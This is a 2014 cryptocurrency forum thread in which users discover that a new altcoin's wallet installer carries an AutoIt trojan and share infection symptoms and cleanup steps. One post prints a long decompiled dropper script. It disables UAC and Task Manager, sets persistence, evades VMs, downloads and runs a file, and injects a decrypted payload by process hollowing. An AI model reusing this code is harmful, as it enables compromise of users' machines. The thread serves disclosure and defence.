Title: [ANN][BlacK] My account was hacked. I did not crea | no premine ✓ | launched NOW
Post by: AngryBirds on January 22, 2014, 10:08:21 PM
My account was hacked. I did not create this topic.
BlacKcoin is SCAM
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: CoinBreader on January 22, 2014, 10:09:45 PM
whats new on this 1 ? ???
edit yep plus its stincky https://www.virustotal.com/en/file/280533d2fa100e421c4dc9feeb5c317fe5503ee5b1a78ba1f39c97ee60c848cb/analysis/1390428774/
Trojan.Siggen6.2654
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Nullu on January 22, 2014, 10:10:02 PM
- No-premine - Free of white supremacists
;D
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: andrealandia on January 22, 2014, 10:11:52 PM
scrypt coin or cpu?
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: sesko on January 22, 2014, 10:12:15 PM
WATCH OUT TROJAN VIRUS INSIDE!!!
FREAKING AUTO SCRIPT VIRUS INSIDE, AV-NOD WENT BALLISTIC.
84922.vbs VBS/Runner.NBS trojan
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: singula on January 22, 2014, 10:12:53 PM
No source in the source archive.
(and as I see, possibly a trojan ... )
FAIL!
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: andrealandia on January 22, 2014, 10:14:04 PM
I'm analysing the Wallet Seem Good: https://www.virustotal.com/it/file/280533d2fa100e421c4dc9feeb5c317fe5503ee5b1a78ba1f39c97ee60c848cb/analysis/1390428801/
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: deodecagone on January 22, 2014, 10:15:15 PM
trojan confirmed got some vbs put here and there :D
this dev is such a retard
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Benezivas on January 22, 2014, 10:17:24 PM
This and the block distribution made for an instamine.
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: AMAZONBTC on January 22, 2014, 10:17:40 PM
fucking idiots
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Snard on January 22, 2014, 10:18:57 PM
It is an autoit trojan.
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Cloudpost on January 22, 2014, 10:19:54 PM
Fuck, I installed the wallet on my empty mining machine. What to do now, try dr web cure it on it or smth, or just reinstall win :D ?
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Snard on January 22, 2014, 10:20:30 PM
Always safer to reinstall.
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Dapk1nmasta on January 22, 2014, 10:20:50 PM
The number of racist jokes I could make right now... TOO DAMN HIGH!
Something like this was bound to happen sooner or later. Someone should launch this on a VPS/VM and see what this program connects to, resolve the no-ip host (assuming OP was smart enough to use it), and fuck around with OP a bit :D
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: andrealandia on January 22, 2014, 10:21:37 PM
How Find if there virus on the .zip?
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Nullu on January 22, 2014, 10:21:48 PM
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: sesko on January 22, 2014, 10:22:17 PM
here you go:
description of virus, don't cry if you lose some coins from wallets.
spywareremove.com/file/displaydriversexe-337529/
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Cloudpost on January 22, 2014, 10:25:06 PM
So sad. It's too late and I just checked the archive with latest Kaspersky AV and after it confirmed the archive is clear, I tried that shit on one of my mining rigs (it's literally empty, just win and few programs there).
What actually does that trojan do?
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Nullu on January 22, 2014, 10:25:17 PM
whats new on this 1 ? ???
edit yep plus its stincky https://www.virustotal.com/en/file/280533d2fa100e421c4dc9feeb5c317fe5503ee5b1a78ba1f39c97ee60c848cb/analysis/1390428774/
Trojan.Siggen6.2654
Many wallets have at least one hit. It's called a false positive. Not that I'm downloading the wallet. I have no interest in this coin.
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: kaene on January 22, 2014, 10:26:28 PM
Please, add SOURCE CODE immediately so that we can really start mining this coin, otherwise FAIL
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: sesko on January 22, 2014, 10:28:34 PM
after installing the wallet (installer), you get in taskmanager (processes) a file: displaydriver.exe
description here: spywareremove.com/file/displaydriversexe-337529/
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Snard on January 22, 2014, 10:31:42 PM
Please, add SOURCE CODE immediately so that we can really start mining this coin, otherwise FAIL
That's a joke right?
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: deodecagone on January 22, 2014, 10:32:34 PM
yes you got also a vbs file starting it in your startup : Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run"displaydrivers.exe ZSABzswGD"
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: kaene on January 22, 2014, 10:34:30 PM
Please, add SOURCE CODE immediately so that we can really start mining this coin, otherwise FAIL
That's a joke right? actually I thought the malware report was a false alarm :P
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: adversor on January 22, 2014, 10:35:55 PM
look at the last posts of this guy:
https://bitcointalk.org/index.php?action=profile;u=117496;sa=showPosts;start=0
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: sussex on January 22, 2014, 10:38:37 PM
look at the last posts of this guy:
https://bitcointalk.org/index.php?action=profile;u=117496;sa=showPosts;start=0
LOL
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: sesko on January 22, 2014, 10:42:28 PM
yes you got also a vbs file starting it in your startup : Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run"displaydrivers.exe ZSABzswGD"
file C:\Users\*******\kpjsf\84922.vbs VBS/Runner.NBS trojan cleaned by deleting - quarantined Event occurred on a new file created by the application: C:\Users\*****\kpjsf\displaydrivers.exe. Antivirus cleaned it, but it popup again every time. So i kill the process, then deleted the folder kpjsf. Hope everything is OK. But is true, he doesn't need a premine on this coin, he will premine your wallets :)
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Snard on January 22, 2014, 10:51:39 PM
Files and folders may be random names. Trojan creates a RunOnce entry that starts a vbs script. This script will launch a random named cmd script, such as C:\Users\User\kpjsf\74851.cmd. This cmd script will start C:\Users\User\kpjsf\displaydrivers.exe with the argument ZSABzswGD. Displaydrivers.exe is autoit3 and the ZSABzswGD is the encrypted autoit script. Trojan Files added:C:\Users\User\kpjsf\ C:\Users\User\kpjsf\74851.cmd C:\Users\User\kpjsf\84922.vbs C:\Users\User\kpjsf\ZSABzswGD C:\Users\User\kpjsf\blackcoin-0.8.6-win32-setup.exe C:\Users\User\kpjsf\displaydrivers.exe C:\Users\User\kpjsf\lcOfvbDCSMZ.CCP C:\Users\User\kpjsf\vbmnWmLUba.CHH Trojan registry keys added:HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\kpjsf C:\Users\User\kpjsf\84922.vbs Wallet files added:C:\Program Files (x86)\Blackcoin\ C:\Program Files (x86)\Blackcoin\blackcoin-qt.exe C:\Program Files (x86)\Blackcoin\daemon\ C:\Program Files (x86)\Blackcoin\daemon\blackcoind.exe C:\Program Files (x86)\Blackcoin\uninstall.exe C:\Users\User\AppData\Roaming\Blackcoin\ C:\Users\User\AppData\Roaming\Blackcoin\.lock C:\Users\User\AppData\Roaming\Blackcoin\blocks\ C:\Users\User\AppData\Roaming\Blackcoin\blocks\blk00000.dat C:\Users\User\AppData\Roaming\Blackcoin\blocks\index\ C:\Users\User\AppData\Roaming\Blackcoin\blocks\index\000003.log C:\Users\User\AppData\Roaming\Blackcoin\blocks\index\CURRENT C:\Users\User\AppData\Roaming\Blackcoin\blocks\index\LOCK C:\Users\User\AppData\Roaming\Blackcoin\blocks\index\LOG C:\Users\User\AppData\Roaming\Blackcoin\blocks\index\MANIFEST-000002 C:\Users\User\AppData\Roaming\Blackcoin\chainstate\ C:\Users\User\AppData\Roaming\Blackcoin\chainstate\000003.log C:\Users\User\AppData\Roaming\Blackcoin\chainstate\CURRENT C:\Users\User\AppData\Roaming\Blackcoin\chainstate\LOCK C:\Users\User\AppData\Roaming\Blackcoin\chainstate\LOG C:\Users\User\AppData\Roaming\Blackcoin\chainstate\MANIFEST-000002 C:\Users\User\AppData\Roaming\Blackcoin\database\ C:\Users\User\AppData\Roaming\Blackcoin\database\log.0000000001 C:\Users\User\AppData\Roaming\Blackcoin\db.log C:\Users\User\AppData\Roaming\Blackcoin\debug.log C:\Users\User\AppData\Roaming\Blackcoin\wallet.dat C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blackcoin\ C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blackcoin\Blackcoin.lnk C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blackcoin\Uninstall Blackcoin.lnk Wallet Registry keys added:HKCU\Software\Blackcoin HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Blackcoin
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Rub3n on January 22, 2014, 10:56:01 PM
look at the last posts of this guy:
https://bitcointalk.org/index.php?action=profile;u=117496;sa=showPosts;start=0
LOL What a joke
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: mycointr on January 22, 2014, 10:56:53 PM
i installed inside sandboxie, a cmd window started to pop up, even after i exited sandboxie. i restarted Windows and searched with malwarebytes, nothing seems wrong and can't find the listed files.. does it have a cleaner that we can %100 sure?
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Snard on January 22, 2014, 11:00:44 PM
This is the autoit script being executed: #NoTrayIcon If ProcessExists("avastui.exe") Then Sleep(20000) $path = "kpjsf" $uniscriptdir = FileGetShortName(@ScriptDir) $uniscriptfullpath = FileGetShortName(@ScriptFullPath) $unicode_startup = FileGetShortName(@StartupDir) $unicode_windows = FileGetShortName(@WindowsDir) $unicode_system = FileGetShortName(@SystemDir) $unicode_userprofile = FileGetShortName(@UserProfileDir) $win_userprofile = "%userprofile%\" FileSetAttrib($uniscriptdir, "+SHR") Local $delay = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "3915629", "2981136", "NotFound") If $delay = "8872084" Then delay() Else EndIf Local $mutex = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "mutex1", "mutex2", "NotFound") If $mutex = "mutex3" Then mutex() Else EndIf Local $startup = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "5342847", "1213271", "NotFound") If $startup = "6122302" Then startup() Else EndIf Local $antis = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "3144514", "8404683", "NotFound") If $antis = "3575235" Then antis() Else EndIf Local $fake = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "fake1", "fake2", "NotFound") If $fake = "fake3" Then fakemessage() Else EndIf Local $botkiller = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "botkiller1", "botkiller2", "NotFound") If $botkiller = "botkiller3" Then botkiller() Else EndIf Local $downloader = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "downloader1", "downloader2", "NotFound") If $downloader = "downloader3" Then downloader() Else EndIf Local $uac = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "uac1", "uac2", "NotFound") If $uac = "uac3" Then disable_uac() Else EndIf Local $systemrestore = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "systemrestore1", "systemrestore2", "NotFound") If $systemrestore = "systemrestore3" Then disable_syste_restore() Else EndIf Local $antitask = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "antitask1", "antitask2", "NotFound") If $antitask = "antitask3" Then antitask() Else EndIf Func delay() $counter = 0 While $counter <= 5 Sleep(5000) ShellExecute(@SystemDir & "\mshta.exe") $counter = $counter + 1 _rundos("taskkill /IM mshta.exe") WEnd EndFunc Func systemhide() RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", 1) RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", 0) EndFunc Func fakemessage() $type = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "messagetype1", "messagetype2", "NotFound") $title = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "messagetitle1", "messagetitle2", "NotFound") $message = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "messagetext1", "messagetext2", "NotFound") If FileExists($unicode_userprofile & "\" & $path & "\check.txt") Then Else MsgBox($type, $title, $message) FileWrite($unicode_userprofile & "\" & $path & "\check.txt", "") EndIf EndFunc Func mutex() $scriptname = "displaydrivers.exe" If UBound(ProcessList($scriptname)) > 2 Then Exit EndFunc Func antitask() $read_antitask = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr") If NOT ($read_antitask = "1") Then RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1") EndIf EndFunc Func disable_uac() $read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA") If NOT ($read_uac = "0") Then RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0") EndIf EndFunc Func startup() $buac = _checkelevationenabled() If $buac = 0 Then Else FileCreateShortcut($unicode_userprofile & "\" & $path & "\84922.vbs", $unicode_startup & "\start.lnk") FileSetAttrib($unicode_startup & "\start.lnk", "+SH") EndIf RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\84922.vbs") If NOT FileExists($unicode_userprofile & "\" & $path & "\84922.vbs") Then Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\74851.cmd", 1) $autoit3 = "displaydrivers.exe" FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & @ScriptName) FileClose($bat) Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\84922.vbs", 1) FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="""' & $unicode_userprofile & "\" & $path & "\" & '74851.cmd"""' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit") FileClose($vbs) RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\84922.vbs") FileSetAttrib($unicode_userprofile & "\" & $path & "\84922.vbs", "+SHR") FileSetAttrib($unicode_userprofile & "\" & $path & "\74851.cmd", "+SHR") If FileExists($unicode_startup & "\start.lnk") Then FileDelete($unicode_startup & "\start.lnk") EndIf Else EndIf EndFunc Func _checkelevationenabled() $read_uac = RegRead("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA") If @error Then Return Local $struct = DllStructCreate("BOOL") Local $artn = DllCall("kernel32.dll", "DWORD", "CheckElevationEnabled", "ptr", DllStructGetPtr($struct)) If @error Then Return SetError(@error) EndIf Return SetError($artn[0], 0, DllStructGetData($struct, 1)) EndFunc Func antis() If WinGetText("Program Manager") = "0" Then Exit Else EndIf If ProcessExists("VboxService.exe") Then Exit EndIf If ProcessExists("VMwaretray.exe") Then Exit EndIf EndFunc Func persistence() If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then $pathtovbs = ($uniscriptdir & "\" & "run.vbs") ShellExecute($pathtovbs) Exit EndIf EndFunc Func downloader() If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then Else FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "") $random_download_name = Random(10000, 99999, 1) & ".exe" Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1) Do Sleep(250) Until InetGetInfo($hdownload, 2) Local $nbytes = InetGetInfo($hdownload, 0) InetClose($hdownload) ShellExecute($unicode_userprofile & "\" & $random_download_name) EndIf EndFunc Func bsod() $a = ProcessList() For $i = 1 To UBound($a) - 1 ProcessClose($a[$i][0]) Next Exit EndFunc Func botkiller() RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run") RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run") RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run") RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run") FileDelete(@StartupDir & "\*.*") EndFunc Func disable_syste_restore() If FileExists($uniscriptdir & "\check.txt") Then Else RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients") FileWrite($uniscriptdir & "\check.txt", "") EndIf EndFunc Func _rundos($scommand) Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE) Return SetError(@error, @extended, $nresult) EndFunc Global Const $prov_rsa_full = 1 Global Const $prov_rsa_aes = 24 Global Const $crypt_verifycontext = -268435456 Global Const $hp_hashsize = 4 Global Const $hp_hashval = 2 Global Const $crypt_exportable = 1 Global Const $crypt_userdata = 1 Global Const $calg_md2 = 32769 Global Const $calg_md4 = 32770 Global Const $calg_md5 = 32771 Global Const $calg_sha1 = 32772 Global Const $calg_3des = 26115 Global Const $calg_aes_128 = 26126 Global Const $calg_aes_192 = 26127 Global Const $calg_aes_256 = 26128 Global Const $calg_des = 26113 Global Const $calg_rc2 = 26114 Global Const $calg_rc4 = 26625 Global Const $calg_userkey = 0 Global $__g_acryptinternaldata[3] Func _crypt_encryptdata($vdata, $vcryptkey, $ialg_id, $ffinal = True) Local $hbuff Local $ierror Local $vreturn Local $reqbuffsize Local $aret _crypt_startup() Do If $ialg_id <> $calg_userkey Then $vcryptkey = _crypt_derivekey($vcryptkey, $ialg_id) If @error Then $ierror = 1 $vreturn = -1 ExitLoop EndIf EndIf $aret = DllCall(__crypt_dllhandle(), "bool", "CryptEncrypt", "handle", $vcryptkey, "handle", 0, "bool", $ffinal, "dword", 0, "ptr", 0, "dword*", BinaryLen($vdata), "dword", 0) If @error OR NOT $aret[0] Then $ierror = 2 $vreturn = -1 ExitLoop EndIf $reqbuffsize = $aret[6] $hbuff = DllStructCreate("byte[" & $reqbuffsize & "]") DllStructSetData($hbuff, 1, $vdata) $aret = DllCall(__crypt_dllhandle(), "bool", "CryptEncrypt", "handle", $vcryptkey, "handle", 0, "bool", $ffinal, "dword", 0, "struct*", $hbuff, "dword*", BinaryLen($vdata), "dword", DllStructGetSize($hbuff)) If @error OR NOT $aret[0] Then $ierror = 3 $vreturn = -1 ExitLoop EndIf $ierror = 0 $vreturn = DllStructGetData($hbuff, 1) Until True Return $vreturn EndFunc Func _crypt_decryptdata($vdata, $vcryptkey, $ialg_id, $ffinal = True) Local $hbuff Local $ierror Local $vreturn Local $htempstruct Local $iplaintextsize Local $aret _crypt_startup() Do If $ialg_id <> $calg_userkey Then $vcryptkey = _crypt_derivekey($vcryptkey, $ialg_id) If @error Then $ierror = 1 $vreturn = -1 ExitLoop EndIf EndIf $hbuff = DllStructCreate("byte[" & BinaryLen($vdata) + 1000 & "]") DllStructSetData($hbuff, 1, $vdata) $aret = DllCall(__crypt_dllhandle(), "bool", "CryptDecrypt", "handle", $vcryptkey, "handle", 0, "bool", $ffinal, "dword", 0, "struct*", $hbuff, "dword*", BinaryLen($vdata)) If @error OR NOT $aret[0] Then $ierror = 2 $vreturn = -1 ExitLoop EndIf $iplaintextsize = $aret[6] $htempstruct = DllStructCreate("byte[" & $iplaintextsize & "]", DllStructGetPtr($hbuff)) $ierror = 0 $vreturn = DllStructGetData($htempstruct, 1) Until True Return $vreturn EndFunc Func _crypt_startup() If __crypt_refcount() = 0 Then Local $hadvapi32 = DllOpen("Advapi32.dll") If @error Then Return SetError(1, 0, False) __crypt_dllhandleset($hadvapi32) Local $aret Local $iproviderid = $prov_rsa_aes If @OSVersion = "WIN_2000" Then $iproviderid = $prov_rsa_full $aret = DllCall(__crypt_dllhandle(), "bool", "CryptAcquireContext", "handle*", 0, "ptr", 0, "ptr", 0, "dword", $iproviderid, "dword", $crypt_verifycontext) If @error OR NOT $aret[0] Then DllClose(__crypt_dllhandle()) Return SetError(2, 0, False) Else __crypt_contextset($aret[1]) EndIf EndIf __crypt_refcountinc() Return True EndFunc Func _crypt_derivekey($vpassword, $ialg_id, $ihash_alg_id = $calg_md5) Local $aret Local $hcrypthash Local $hbuff Local $ierror Local $vreturn _crypt_startup() Do $aret = DllCall(__crypt_dllhandle(), "bool", "CryptCreateHash", "handle", __crypt_context(), "uint", $ihash_alg_id, "ptr", 0, "dword", 0, "handle*", 0) If @error OR NOT $aret[0] Then $ierror = 1 $vreturn = -1 ExitLoop EndIf $hcrypthash = $aret[5] $hbuff = DllStructCreate("byte[" & BinaryLen($vpassword) & "]") DllStructSetData($hbuff, 1, $vpassword) $aret = DllCall(__crypt_dllhandle(), "bool", "CryptHashData", "handle", $hcrypthash, "struct*", $hbuff, "dword", DllStructGetSize($hbuff), "dword", $crypt_userdata) If @error OR NOT $aret[0] Then $ierror = 2 $vreturn = -1 ExitLoop EndIf $aret = DllCall(__crypt_dllhandle(), "bool", "CryptDeriveKey", "handle", __crypt_context(), "uint", $ialg_id, "handle", $hcrypthash, "dword", $crypt_exportable, "handle*", 0) If @error OR NOT $aret[0] Then $ierror = 3 $vreturn = -1 ExitLoop EndIf $ierror = 0 $vreturn = $aret[5] Until True If $hcrypthash <> 0 Then DllCall(__crypt_dllhandle(), "bool", "CryptDestroyHash", "handle", $hcrypthash) Return SetError($ierror, 0, $vreturn) EndFunc Func __crypt_contextset($hcryptcontext) $__g_acryptinternaldata[2] = $hcryptcontext EndFunc Func __crypt_context() Return $__g_acryptinternaldata[2] EndFunc Func __crypt_dllhandleset($hadvapi32) $__g_acryptinternaldata[1] = $hadvapi32 EndFunc Func __crypt_dllhandle() Return $__g_acryptinternaldata[1] EndFunc Func __crypt_refcountdec() If $__g_acryptinternaldata[0] > 0 Then $__g_acryptinternaldata[0] -= 1 EndFunc Func __crypt_refcountinc() $__g_acryptinternaldata[0] += 1 EndFunc Func __crypt_refcount() Return $__g_acryptinternaldata[0] EndFunc submain() Func submain() $skey = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "6755425", "6755425", "NotFound") $sapppath1 = FileGetShortName(@ScriptDir & "\vbmnWmLUba.CHH") $sapppath = FileRead(FileOpen($sapppath1, 16)) $sarquive = _crypt_decryptdata($sapppath, $skey, $calg_rc2) _runpe($sarquive) EndFunc Func info($getfiledata, $stringtoget) Return StringTrimLeft($getfiledata, StringInStr($getfiledata, $stringtoget) - 1 + StringLen($stringtoget)) EndFunc Func _runpe($bbinaryimage, $scommandline = "") #Region 1. DETERMINE INTERPRETER TYPE Local $fautoitx64 = @AutoItX64 #Region 2. PREDPROCESSING PASSED Local $bbinary = Binary($bbinaryimage) Local $tbinary = DllStructCreate("BYTE[" & BinaryLen($bbinary) & "]") DllStructSetData($tbinary, 1, $bbinary) Local $ppointer = DllStructGetPtr($tbinary) #Region 3. CREATING NEW PROCESS $inject_net2_regsvc = ($unicode_windows & "\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe") $inject_net4_regsvc = ($unicode_windows & "\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe") $inject_net2_regasm = ($unicode_windows & "\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe") $inject_net4_regasm = ($unicode_windows & "\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe") $inject_net2_applaunch = ($unicode_windows & "\Microsoft.NET\Framework\v2.0.50727\AppLaunch.exe") $inject_net4_applaunch = ($unicode_windows & "\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe") $inject_newdev = ($unicode_system & "\newdev.exe") $inject_twunk_32 = ($unicode_windows & "\twunk_32.exe") $inject_ndadmin = ($unicode_system & "\ndadmin.exe") If FileExists($inject_net4_regsvc) Then Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net4_regsvc, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information)) ElseIf FileExists($inject_net2_regsvc) Then Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net2_regsvc, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information)) ElseIf FileExists($inject_net4_regasm) Then Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net4_regasm, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information)) ElseIf FileExists($inject_net2_regasm) Then Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net2_regasm, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information)) ElseIf FileExists($inject_net4_applaunch) Then Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net4_applaunch, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information)) ElseIf FileExists($inject_net2_applaunch) Then Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_net2_applaunch, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information)) ElseIf FileExists($inject_newdev) Then Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_newdev, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information)) ElseIf FileExists($inject_twunk_32) Then Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_twunk_32, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information)) Else Local $acall = DllCall("KERNEL32.DLL", "BOOL", "CreateProcessW", "WSTR", $inject_ndadmin, "WSTR", $scommandline, "PTR", 0, "PTR", 0, "INT", 0, "DWORD", 4, "PTR", 0, "PTR", 0, "PTR", DllStructGetPtr($tstartupinfo), "PTR", DllStructGetPtr($tprocess_information)) EndIf If @error OR NOT $acall[0] Then Return SetError(1, 0, 0) Local $hprocess = DllStructGetData($tprocess_information, "PROCESS") Local $hthread = DllStructGetData($tprocess_information, "THREAD") If $fautoitx64 AND __runpe_iswow64process($hprocess) Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0) Return SetError(2, 0, 0) EndIf #Region 4. FILL CONTEXT STRUCTURE Local $irunflag, $tcontext If $fautoitx64 Then If @OSArch = "X64" Then $irunflag = 2 Else $irunflag = 3 DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0) Return SetError(102, 0, 0) EndIf Else $irunflag = 1 EndIf Local $context_full Switch $irunflag Case 1 $context_full = 65543 Case 2 $context_full = 1048583 Case 3 $context_full = 524327 EndSwitch DllStructSetData($tcontext, "CONTEXTFLAGS", $context_full) $acall = DllCall("KERNEL32.DLL", "BOOL", "GetThreadContext", "HANDLE", $hthread, "PTR", DllStructGetPtr($tcontext)) If @error OR NOT $acall[0] Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0) Return SetError(3, 0, 0) EndIf Local $ppeb Switch $irunflag Case 1 $ppeb = DllStructGetData($tcontext, "EBX") Case 2 $ppeb = DllStructGetData($tcontext, "RDX") Case 3 EndSwitch #Region 5. READ PE-FORMAT Local $pheaders_new = $ppointer $ppointer += DllStructGetData($timage_dos_header, "ADDRESSOFNEWEXEHEADER") Local $smagic = DllStructGetData($timage_dos_header, "MAGIC") If NOT ($smagic == "MZ") Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 